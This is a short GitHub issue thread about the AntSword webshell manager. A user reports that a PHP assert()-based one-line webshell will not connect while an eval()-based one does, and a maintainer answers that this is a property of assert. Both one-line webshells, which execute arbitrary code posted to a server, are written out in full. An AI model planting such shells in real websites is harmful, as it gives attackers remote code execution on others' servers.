### ISSUE TITLE
php使用assert函数构造的shell连接bug

### ISSUE THREAD

**Issue by last0monster** [AntSwordProject/antSword#224]
- [x] 我确定这是蚁剑本身的一个 Bug，我并不是在询问如何使用蚁剑
- [x] 我确定已经将蚁剑升级至[软件发布页面](https://github.com/AntSwordProject/AntSword/releases)中的**最新版**
- [x] 我已经阅读过蚁剑的开发文档，并且尝试过自己通过Google等方式解决问题

---

## 报告 Bug

- [ ] 我使用的操作系统是 ***macOS*** 10+
- [ ] 我使用的操作系统是 ***Debian/Ubuntu*** GNU/Linux
- [ ] 我使用的操作系统是 ***Fedora*** GNU/Linux
- [ ] 我使用的操作系统是 ***Arch*** GNU/Linux
- [ ] 我使用的操作系统是 ***Other*** GNU/Linux
- [x] 我使用的操作系统是 ***Windows*** 10+

---

- [ ] 我使用的是 32 位操作系统
- [x] 我使用的是 64 位操作系统

### Bug 详细描述

php使用assert函数的shell无法连接，php版本是5
php shell 如下：
<?php assert($_POST['wow']);?>

默认不使用任何编码，连接不上shell；
选择任何一个内置的编码器，比如base64能连接上shell；
然而选择自己编写的编码器又连接不上，我确定自己编写的编码器没有任何问题（将assert函数替换成eval，自己编写的编码器正常工作）；

将shell的assert函数替换成eval没有以上问题，各种编码器正常工作。
shell如下：
<?php eval($_POST['wow']);?>

---

**Comment by Medicean** [comment]
并不是 bug, 是 assert 的特性。具体原因参考这篇文章:

https://mp.weixin.qq.com/s/EHDvRA3Lpykpu0BDS17ENQ
